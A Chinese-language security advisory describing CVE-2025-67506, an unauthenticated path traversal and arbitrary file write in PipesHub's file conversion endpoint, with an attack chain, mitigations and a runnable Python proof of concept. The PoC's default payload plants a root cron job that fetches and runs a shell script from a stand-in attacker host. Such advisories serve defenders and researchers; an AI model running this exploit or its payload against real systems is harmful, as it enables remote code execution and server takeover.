CVE-2025-67506 PipesHub路径遍历导致任意文件写入漏洞

漏洞信息

漏洞编号

CVE-2025-67506

漏洞类型

路径遍历/任意文件写入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PipesHub

漏洞概述

PipesHub是一个完全可扩展的企业级工作场所AI平台，专注于企业搜索和工作流程自动化。该平台在0.1.0-beta之前的版本中存在严重的路径遍历漏洞，源于/api/v1/record/buffer/convert端点缺少身份认证机制。攻击者无需任何权限即可访问该端点，通过上传文件并利用文件名中的路径遍历序列（如../）来突破预期目录限制，将文件写入服务器任意位置。由于该端点使用LibreOffice进行PDF转换，攻击者可以构造恶意文件名实现任意文件覆盖或植入恶意代码。此漏洞影响所有使用受影响版本的企业，可能导致远程代码执行、数据泄露、服务中断等严重后果。攻击复杂度低，无需用户交互，属于最高危漏洞类别。

技术细节

漏洞根源在于PipesHub的文件上传处理逻辑存在路径遍历缺陷。端点POST /api/v1/record/buffer/convert接受文件上传后，使用os.path.join(tmpdir, file.filename)构建目标文件路径，但未对file.filename进行规范化处理（如使用os.path.normpath或检查..序列）。攻击者可通过构造类似../../../etc/cron.d/malicious的文件名，使文件被写入/tmp目录之外的任意位置。由于服务账户通常具有较高权限，攻击者可覆盖系统配置文件、植入计划任务、上传WebShell或修改应用代码，实现远程代码执行。漏洞利用条件极低，无需认证即可触发，属于典型的无限制文件上传漏洞。修复版本为0.1.0-beta，需在文件路径处理前进行严格的路径规范化验证。

攻击链分析

STEP 1

步骤1

攻击者发现目标PipesHub服务器存在/api/v1/record/buffer/convert端点，该端点无需认证即可访问

STEP 2

步骤2

攻击者构造恶意文件上传请求，在filename参数中嵌入路径遍历序列（如../../../etc/cron.d/malicious）

STEP 3

步骤3

服务端使用os.path.join(tmpdir, file.filename)构建文件路径，由于未进行路径规范化，..序列未被过滤

STEP 4

步骤4

恶意文件被写入服务器任意位置，绕过预期的/tmp目录限制

STEP 5

步骤5

攻击者可通过写入计划任务、SSH authorized_keys、WebShell等方式实现持久化远程代码执行

STEP 6

步骤6

利用LibreOffice的文件处理功能，攻击者可触发恶意代码执行或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-67506 PoC - Path Traversal in PipesHub file upload
# Affected: PipesHub < 0.1.0-beta

def exploit(target_url, filename_payload, file_content):
    """
    Exploit path traversal vulnerability in PipesHub file upload endpoint
    Args:
        target_url: Target base URL (e.g., http://target.com)
        filename_payload: Malicious filename with path traversal (e.g., ../../../etc/cron.d/backdoor)
        file_content: Content to write to the arbitrary location
    """
    endpoint = f"{target_url}/api/v1/record/buffer/convert"
    
    files = {
        'file': (filename_payload, file_content, 'application/octet-stream')
    }
    
    try:
        print(f"[*] Sending malicious request to {endpoint}")
        print(f"[*] Filename payload: {filename_payload}")
        
        response = requests.post(endpoint, files=files, timeout=30)
        
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response Body: {response.text[:500]}")
        
        if response.status_code == 200:
            print("[+] File upload successful - path traversal worked!")
            return True
        else:
            print("[-] Exploit failed - check target or payload")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://vulnerable-server.com")
        sys.exit(1)
    
    target = sys.argv[1]
    
    # Example: Write to /etc/cron.d for reverse shell persistence
    malicious_filename = "../../../etc/cron.d/pwned"
    malicious_content = "* * * * * root wget http://attacker.com/shell.sh | bash\n"
    
    exploit(target, malicious_filename, malicious_content)

影响范围

PipesHub < 0.1.0-beta

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时措施：1) 通过网络层访问控制限制对/api/v1/record/buffer/convert端点的访问；2) 在反向代理层实施请求过滤，拦截包含../序列的请求参数；3) 临时禁用文件上传功能；4) 监控服务器文件系统变更日志，及时发现异常文件创建行为。建议尽快升级至官方发布的修复版本0.1.0-beta。